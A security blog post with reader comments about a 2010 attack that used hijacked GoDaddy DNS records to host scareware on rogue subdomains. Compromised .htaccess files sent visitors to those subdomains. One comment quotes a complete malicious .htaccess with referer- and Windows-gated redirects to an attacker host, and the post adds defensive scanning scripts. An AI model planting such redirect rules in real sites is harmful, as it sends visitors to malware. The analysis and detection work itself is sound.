
Malware on Hijacked Subdomains. New Trend?

   22 May 10   Filed in Website exploits

Yesterday, Patrick (aka Noxwizard, phpBB support team member) pointed me to a new malware attack that surfaced this week (first mentioned on May 16th).

The attack creates/modifies .htaccess files to redirect site visitors that come from major search engines and popular websites (e.g. Twitter, Facebook, Wikipedia, Flickr, eBay, etc.) to scareware sites that aggressively push fake anti-virus software. The redirects also occur if visitors request nonexistent pages or pages that produce server errors.

This .htaccess conditional redirect approach is nothing new. It has been actively exploited by hackers for at least a couple of years (and Unmask Parasites does a good job of detecting such redirects). And while the .htaccess code in this particular case has some new features (maybe more about it next time), it isn’t the most interesting thing about this attack.

Suspicious subdomains

Thanks to the Google search suggested by Patrick (“main.php?e=4&h”) I was able to analyze the .htaccess code from multiple compromised sites. They all redirected to different scareware sites, but all those sites had similarly strange subdomains: www2, dns, ns1, ns2.

Here’s a list of 12 such sites that I found:

  • www2.smoothsouthernsoulandblues .com
  • dns.thesoulfoodcafe .com
  • ns2.landmarkengineering .net
  • ns2.lighthouseusa .net
  • ns1.ptrtool .com
  • ns2.doballoons .com
  • ns1.vimoka .net
  • ns2.vimoksha .org
  • www2.shopezlive .com
  • ns1.asmartmovehi .com
  • ns1.chestermoon .com
  • ns2.moonlightingelectric .com
  • ns.southernsoulnetwork .com (added on May 23, 2010)
  • ns2.sxm22 .com (added on May 24, 2010)
  • my.layouts2go .com at 95.211.131.185 (added on May 24, 2010)
  • ww.vailconstruction.net at 95.211.131.185 (added on May 27, 2010)
  • www2.dsc-show .com (added on June 1, 2010)
  • wwww.natebennettfleming .com (added on June 1, 2010)
  • wwww.artsrental .in (added on June 22, 2010)
  • wwww.causeof .org (added on June 22, 2010)
  • ns2.tiredwolfhome .com (added on June 22, 2010)
  • wiki.nahorodny .com (added on July 9, 2010)
  • wwww.artrentals .in (added on July 14, 2010)
  • top.reliablebanner.com (added on July 22, 2010)
  • wiki.electnate.com (added on July 22, 2010)
  • wwww.artrent .in (added on August 1, 2010)
  • wwww.insurancestrategiesblog .com (added on August 1, 2010)
  • ns1.buckcreekcamp .org (added on August 5, 2010)
  • ns2.wowrobinearl .com (added on August 10, 2010)
  • (blog | secure).drugfreecard .info (added on August 10, 2010)
  • store.mywowtv .org (added on August 16, 2010)
  • (ns2 | wwww).wheelerairservice.com (added on August 16, 2010)
  • (ns1 | blog | secure).phonesforwow.com (added on August 16, 2010)
  • wwww.freighthousesquare.com (added on August 16, 2010)

This is definitely just the tip of the iceberg (only what webmasters who cared to share information about their problems posted during the last week), and there may be many more such sites.

All these subdomains point to the same IP: 195 .2 .253 .42 (Madet Ltd, Russia). At the same time, the main (second level) domains point to entirely different IPs. Some of them are legitimate websites and some are just parked domains.

DNS lookup: rogue A records

The dig command shows that those subdomains are configured as A records in the domains’ DNS settings.

For example, let’s take the parked lighthouseusa.net domain. Its A record points to GoDaddy’s parking service:

lighthouseusa.net. 3600 IN A 68.178.232.100

but if you dig the ns2.lighthouseusa .net subdomain, you’ll see another A record:

ns2.lighthouseusa.net. 1800 IN A 195.2.253.42

This means that hackers have access to and can modify DNS records of those second level domains.

Stolen GoDaddy accounts

Apparently, all those second level domains are registered via GoDaddy and use GoDaddy’s name servers.

They belong to different people, but some of them have the same owner (e.g. smoothsouthernsoulandblues.com and thesoulfoodcafe.com, or vimoka.net and vimoksha.org). This makes me think that hackers used stolen GoDaddy account credentials.

Phishing or malware?

Most likely the credential theft was the result of a phishing attack. If you google for “GoDaddy phishing” you will see a lot of messages about emails “from GoDaddy” that ask you to change/update some records and point to phishing pages that look exactly like GoDaddy.com.

Alternatively, hackers could use malware (keyloggers or browser add-ons) that steal credentials when people log into their GoDaddy accounts from infected computers.

Is it a trend?

It is clear that hackers have figured out that subdomains of legitimate websites are an almost infinite source of free domain names for their attack sites. With access to DNS settings, they can create arbitrary subdomains that point to their own servers. Such subdomains can hardly be noticed by domain owners, who rarely check their DNS records after the initial domain configuration. And they cost hackers nothing.

I wonder if using hijacked subdomains of legitimate websites is a new trend in malware distribution or just a temporary solution that won’t be widely adopted by cybercriminals in the long run (like dynamic DNS domains last September).

To domain owners

At this point, domain owners should be aware of this problem and be serious about protecting their account credentials.

Don’t trust emails that ask you to change/confirm account information. Always double-check that they are genuine and lead to genuine websites. Also make sure that your computers are malware-free.

To be on the safe side, check the DNS settings of your domains for rogue records and change your account password.
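The rogue-record check recommended above, as an added example that is not part of the original post: a Python script that resolves the hostname labels seen in the list of rogue subdomains (www2, dns, ns1, ns2, wwww, wiki, blog, secure, store, top, my, ww, ns) under your own domain and reports any that resolve to an address outside the apex domain’s own addresses, or outside a baseline of hosting IPs you pass in. The function names, the label list and the offline sample zone are assumptions; the sample zone is constructed to mirror the dig output shown above (apex at the parking service, ns2 at the attacker’s IP), and a live run uses the OS resolver.

```python
"""Look for rogue A records under a domain: hostnames that resolve to an
address the owner does not use. Added example, not code from the original post."""
import socket
from typing import Callable, Dict, Iterable, List, Optional

# Labels used by the rogue subdomains listed in the post, plus plain "www".
SUSPECT_LABELS = ("www", "www2", "wwww", "ww", "dns", "ns", "ns1", "ns2",
                  "wiki", "blog", "secure", "store", "top", "my")

Resolver = Callable[[str], List[str]]


def system_resolver(name: str) -> List[str]:
    """Resolve NAME with the OS resolver; [] when the name does not exist."""
    try:
        return sorted(set(socket.gethostbyname_ex(name)[2]))
    except (socket.gaierror, socket.herror):
        return []


# Offline sample zone, constructed to mirror the dig output in the post:
# the apex points at the parking service, ns2 points at the attacker's host.
SAMPLE_ZONE: Dict[str, List[str]] = {
    "lighthouseusa.net": ["68.178.232.100"],
    "www.lighthouseusa.net": ["68.178.232.100"],
    "ns2.lighthouseusa.net": ["195.2.253.42"],
}


def sample_resolver(name: str) -> List[str]:
    """Stand-in for the OS resolver so the demo runs offline."""
    return SAMPLE_ZONE.get(name, [])


def find_rogue_records(domain: str,
                       expected_ips: Optional[Iterable[str]] = None,
                       labels: Iterable[str] = SUSPECT_LABELS,
                       resolve: Resolver = system_resolver) -> Dict[str, List[str]]:
    """Return {hostname: unexpected_ips} for every label that resolves to an
    address not in EXPECTED_IPS. When EXPECTED_IPS is None the apex's own
    addresses are the baseline, which is the comparison the post makes with dig."""
    baseline = set(expected_ips) if expected_ips is not None else set(resolve(domain))
    rogue: Dict[str, List[str]] = {}
    for label in labels:
        host = f"{label}.{domain}"
        unexpected = [ip for ip in resolve(host) if ip not in baseline]
        if unexpected:
            rogue[host] = unexpected
    return rogue


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        hits = find_rogue_records(sys.argv[1])  # live lookup via the OS resolver
    else:
        hits = find_rogue_records("lighthouseusa.net", resolve=sample_resolver)
    for host, ips in hits.items():
        print(f"ROGUE? {host} -> {', '.join(ips)}")
```

Two caveats when running this for real: a baseline taken from the apex is only right when every legitimate hostname shares the apex’s addresses, so pass expected_ips when mail, CDN or round-robin hosts differ; and guessing labels can never prove a zone clean, so the authoritative check is still reading the full record list in the registrar’s DNS panel, which is where an attacker with stolen credentials added the record in the first place.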

Have your say

What do you think about serving malware from hijacked subdomains of legitimate websites? Is this approach viable? Do you know any other attacks that involve hacked DNS records? Maybe you have details about this particular attack?

Your comments are welcome.


Reader's Comments (28)

  1. |

    There has definitely been a shift toward doing something a little more ‘valuable’ with hacked websites. The fake drug scams have had a lot of law enforcement action. Following the main money trails, there’s not as much demand for the hacked websites to serve drugs. It’s much easier to serve malware from a domain with a previously known good domain. Koobface adapted to that as well.

  2. |

    Or you can stop using hosting providers and running your own DNS. Fail.

  3. |

    Whenever I access my own website www .galgiani .com / AVG throws out a detection warning – Exploit Rogue MCOS (type 1041) — I believe related to this issue – (has a www2 .shopezlive .com tagging) – how can I get rid of whatever needs ridding? thanks

    • |

      Did you find the .htaccess file with malicious rewrite rules?

    • |

      Did anyone ever answer your question? How do you fix it? It seems everyone gets distracted before providing an answer. Were you able to fix it?

      • |

        The fix is obvious:
        1. Remove malware from your computer
        2. Change all site passwords (hackers use stolen FTP credentials)
        3. Remove the malicious redirect rules from .htaccess

        • |

          The answer may seem obvious but it ain’t necessarily so. What if your WordPress site has been infected by an SQL injection attack which has compromised the database and your tables and files have base64 encoded scripting inserted into them. Those three steps won’t help much…

          • |

            It’s good that you consider alternatives, however in this particular case we are not talking about WordPress (all types of sites are getting infected), and we have a confirmed infection vector (via FTP).

  4. |

    [...] redirects also occur if visitors request unexisting pages or pages that produce server errors. Malware on Hijacked Subdomains. New Trend? | Unmask Parasites. Blog. [...]

  5. |

    Wow. You folks are smarter than GoDaddy. But, then, that’s not all that hard. Still, we appreciate your contribution to this issue.

  6. |

    I saw this one today as well. The .htaccess is very similar to this one:

    http://blog.sucuri.net/2010/04/conditional-redirects-or-htaccess.html

    But in this case the domain was not at godaddy..

    • |

      David, do you mean the domain of the hacked site or the domain with a rogue subdomain where the hacked site redirects traffic?

  7. |

    Interesting stuff!

    But aren’t we talking about two different things here?

    1. Hijacking via .htaccess rewrites. The victim has to arrive via one of the given domains (e.g. search engines) in the rewrite rules. This attack will take over the regular search hits but most likely be noticed in the statistics.

    2. Hijacking via spurious DNS records pointing a previously unused subdomain to the malware site. The victim has to arrive directly on the hijacked subdomain. This attack can go on for years without notice.

    Or are .htaccess files used in combination with the malicious DNS records?

    • |

      In this case the .htaccess redirect attack uses rogue subdomains of third party sites as the destination of the redirects.

      So hacked DNS records (result of one attack) are used to create infrastructure for another attack (malicious redirects).

  8. |

    I got the following .htaccess rewritten on my site… this was after they hijacked the site:

    ErrorDocument 500 hxxp://dns.thesoulfoodcafe .com/main.php?i=Jcysg9UUrPKlgRj7V8NPyZIXpA==&e=0
    ErrorDocument 502 hxxp://dns.thesoulfoodcafe .com/main.php?i=Jcysg9UUrPKlgRj7V8NPyZIXpA==&e=2
    ErrorDocument 403 hxxp://dns.thesoulfoodcafe .com/main.php?i=Jcysg9UUrPKlgRj7V8NPyZIXpA==&e=3

    RewriteEngine On

    RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*odnoklassniki.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*vkontakte.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*tube.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*wikipedia.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*blogger.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*baidu.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*qq\.com.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*myspace.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*twitter.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*facebook.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*live.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*bing.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*amazon.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*ebay.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*linkedin.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*flickr.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*livejasmin.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*soso.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*doubleclick.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*pornhub.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*orkut.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*livejournal.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*wordpress.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*excite.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*netscape.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*hotbot.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*goto.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*infoseek.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*mamma.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*alltheweb.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*lycos.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*search.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*metacrawler.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*mail.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*dogpile.*$ [NC]

    RewriteCond %{HTTP_USER_AGENT} .*Windows.*
    RewriteRule .* hxxp://dns.thesoulfoodcafe .com/main.php?e=r&h=%{HTTP_HOST}&i=Jcysg9UUrPKlgRj7V8NPyZIXpA== [R,L]

    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteCond %{REQUEST_FILENAME} !.*jpg$|.*gif$|.*png$
    RewriteCond %{HTTP_USER_AGENT} .*Windows.*
    RewriteRule .* hxxp://dns.thesoulfoodcafe .com/main.php?e=4&h=%{HTTP_HOST}&i=Jcysg9UUrPKlgRj7V8NPyZIXpA== [R,L]

  9. |

    I just had a friend with a similar hack. .htaccess was changed on May 24 but I have no idea how they did that.. any ideas?

    it redirected to ww.VAILCONSTRUCTION.NET and yes that is also a godaddy account, the hacked site is not. it’s a flash gallery site with just a few pages and a few php pages. maybe there is a leak in there..

  10. |

    First off, the target IP, 195.2.253.42 is still actively serving malware. Second, try this search – “main.php?e=r&h=” and you’ll see many more domains complaining.

    It’s a big problem if you block things by domain, because the redirect never drops out to the bare IP – instead, it looks to your local agent like you’ve contacted a subdomain of some site. This will cause safebrowsing all sorts of fits.

    • |

      Added – it appears that more RBN IPs are part of this. I just saw 95.211.131.185

  11. |

    Apparently a big problem with GoDaddy clients.

    I run a small hosting company and have had a few new clients due to similar problems with their previous hosting companies.

    Yes, 90% of the time these problems stem from your .htaccess being hijacked and it’s advisable that you use stronger passwords on your websites.

    Majority of these problems are started by having passwords too weak. Use stronger passwords for a harder time cracking it. Less problems to worry about in the long run.

    Great article. Thanks for sharing this information!

  12. |

    Hmmm, I have the same problem but my website is in flash and I don’t use an .htaccess file for this site since I don’t need any rewrite rules. When I visit my site as soon as I get to the home page my antivirus goes crazy and it looks like my site is trying to redirect to wiki.natebennettfleming.com/main.php?e=r&h= which is on the list above.

    I checked the DNS zone for this domain in my hosting panel and there isn’t an A record for any other IP other than my host’s.

    Where else can I find where this may be inserted so that I can cure my site?

    It’s not in DNS zone as an A-record and it’s not in .htaccess, I checked every level up to the root and I don’t have any .htaccess for this site.

    Any help is appreciated.

    • |

      Dan,

      Rogue A-records don’t apply to hacked sites. They apply to the sites where your webpages redirect to. In your case, wiki.natebennettfleming .com is an A-record of natebennettfleming .com

      >I checked every level up to the root

      Did you check above the root?

  13. |

    - UPDATE –

    Ok so since I could not find the redirect rule in any .htaccess and didn’t see an A-record I decided to:

    1) Back the site up by changing the directory’s name since it was an addon domain.

    2) Create a new/blank directory with the previous name.

    3) Delete the addon domain from cPanel. This is why I created a blank directory because otherwise cPanel might have a problem deleting a site that didn’t have a directory found.

    4) I re-added the addon domain.

    5) I deleted the directory that was automatically created when I added the addon domain again and then renamed the old directory that I previously named something else back to the original name.

    That solved it!

    Not sure how because there wasn’t an A-Record before but if there was somewhere or somehow by doing the above I erased my DNS zone records and started fresh. I never found anything in .htaccess, in fact I don’t have an .htaccess file for this particular site, so if anyone else comes across this hopefully this will help.

    Best of luck :)

  14. |

    I have 2 websites with a 302 redirect to electnate.com

    I scanned the websites and didn’t find any inserted code. I checked the .htaccess files but they are empty even though they shouldn’t be. So I changed the file name in httpd.conf from .htaccess to .testing, this way Apache would ignore any .htaccess files, and see what happened. After doing this I ran the unmaskparasites tool again and it no longer found the 302 redirect for the sites but now I’m confused.

    It seems that 302 redirect rule for electnate would then have to be in one of the .htaccess files that I had Apache ignore but, the .htaccess files are empty.

    If I don’t have the .htaccess files then my websites don’t work properly and if I do have them somehow there is a hidden 302 redirect.

    Why are my .htaccess files mysteriously empty?

    I checked the entire server from root down, one directory at a time (it took hours) and there are no other .htaccess files other than the ones in public_html for each site but why are they empty and how come I can’t see the content?

    • |

      Do you mean 0 bytes by empty?

      Note, sometimes hackers add several screens of blank lines before the actual code. This way files may look empty when you open them in a text editor/viewer and don’t pay attention to the scrollbar (or there is no scrollbar in case of terminal editors like vi or nano).
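A scanner for the conditional-redirect pattern quoted in comment 8 and for the blank-line padding trick just mentioned, added here as an example that is not code from the post or from any of its commenters. It flags ErrorDocument targets on another host, RewriteRule targets on another host together with the HTTP_REFERER / HTTP_USER_AGENT conditions that gate them, and a run of blank lines before the first directive, so a file that “looks empty” still produces a finding. The sample .htaccess text is constructed; dns.rogue-example.invalid is a placeholder host, and the function names and the own_hosts whitelist parameter are this example’s own assumptions.

```python
"""Scan .htaccess text for the conditional-redirect pattern described in the
post: ErrorDocument and RewriteRule targets on another host, gated on
HTTP_REFERER / HTTP_USER_AGENT, possibly hidden below a run of blank lines.
Added example; not code from the original post or its commenters."""
import re
from typing import Dict, List, Optional, Sequence

URL_RE = re.compile(r"https?://([^/\s]+)", re.IGNORECASE)
ERRDOC_RE = re.compile(r"^\s*ErrorDocument\s+(\d{3})\s+(\S+)", re.IGNORECASE)
COND_RE = re.compile(r"^\s*RewriteCond\s+%\{(\w+)\}", re.IGNORECASE)
RULE_RE = re.compile(r"^\s*RewriteRule\s+\S+\s+(\S+)", re.IGNORECASE)
# Variables an attacker tests so the redirect fires only for search/social traffic.
GATING_VARS = {"HTTP_REFERER", "HTTP_USER_AGENT"}

# Constructed sample: 300 blank lines, then a trimmed-down version of the rules
# quoted in the comments. dns.rogue-example.invalid is a placeholder host.
SAMPLE_HTACCESS = "\n" * 300 + """\
ErrorDocument 500 http://dns.rogue-example.invalid/main.php?e=0
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.*$ [NC]
RewriteCond %{HTTP_USER_AGENT} .*Windows.*
RewriteRule .* http://dns.rogue-example.invalid/main.php?e=r&h=%{HTTP_HOST} [R,L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{HTTP_USER_AGENT} .*Windows.*
RewriteRule .* http://dns.rogue-example.invalid/main.php?e=4&h=%{HTTP_HOST} [R,L]
"""


def _external_host(target: str, own_hosts: Sequence[str]) -> Optional[str]:
    """Host of an absolute-URL target, or None for local paths and our own hosts."""
    m = URL_RE.match(target)
    if not m:
        return None
    host = m.group(1).lower()
    return None if host in {h.lower() for h in own_hosts} else host


def scan_htaccess(text: str, own_hosts: Sequence[str] = (),
                  blank_threshold: int = 20) -> List[Dict[str, str]]:
    """Return a list of findings, each {line, kind, detail}, in file order."""
    findings: List[Dict[str, str]] = []
    lines = text.splitlines()

    # Padding check: the code may sit below "several screens" of blank lines.
    leading = 0
    for line in lines:
        if line.strip():
            break
        leading += 1
    if leading >= blank_threshold:
        findings.append({"line": "1", "kind": "leading_blank_lines",
                         "detail": f"{leading} blank lines before first directive"})

    pending: set = set()  # RewriteCond variables seen since the last RewriteRule
    for no, line in enumerate(lines, 1):
        m = ERRDOC_RE.match(line)
        if m:
            host = _external_host(m.group(2), own_hosts)
            if host:
                findings.append({"line": str(no), "kind": "errordocument_external",
                                 "detail": f"HTTP {m.group(1)} -> {host}"})
            continue
        m = COND_RE.match(line)
        if m:
            pending.add(m.group(1).upper())
            continue
        m = RULE_RE.match(line)
        if m:
            host = _external_host(m.group(1), own_hosts)
            if host:
                gates = sorted(pending & GATING_VARS)
                kind = "conditional_redirect_external" if gates else "redirect_external"
                findings.append({"line": str(no), "kind": kind,
                                 "detail": f"-> {host}, gated on {', '.join(gates) or 'nothing'}"})
            pending = set()  # conditions apply only to the rule that follows them
    return findings


def scan_file(path: str, own_hosts: Sequence[str] = ()) -> List[Dict[str, str]]:
    """Scan a file on disk; undecodable bytes are replaced rather than raised on."""
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        return scan_htaccess(fh.read(), own_hosts)


if __name__ == "__main__":
    import sys
    results = scan_file(sys.argv[1]) if len(sys.argv) > 1 else scan_htaccess(SAMPLE_HTACCESS)
    for f in results:
        print(f"line {f['line']}: {f['kind']} ({f['detail']})")
```

Run it over every .htaccess found with find from the document root upward (the attack in comment 12’s thread was above the site’s own root), and pass own_hosts with the site’s real hostnames so legitimate redirects to a www or canonical host are not reported. A finding of the leading_blank_lines kind on a file that appears empty in an editor is exactly the situation described above, and is the cue to look at the byte size rather than the screen.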

  15. |

    [...] by a hijacked DNS server for a French construction company. This may be related to other reports of sub-domains being used to mask scam sites off of otherwise reputable domain names. The last four phishes I investigated have all referenced [...]

  16. |

    Isn’t this a rather old method that hackers have been doing for a while now? I have found several reputable sites that host malware because either the webmaster did not update the infrastructure such as a wordpress install, or the hacker has basically taken control of the site inserting his scripts.

    Google is now starting to weed out these sites and not list them on search results.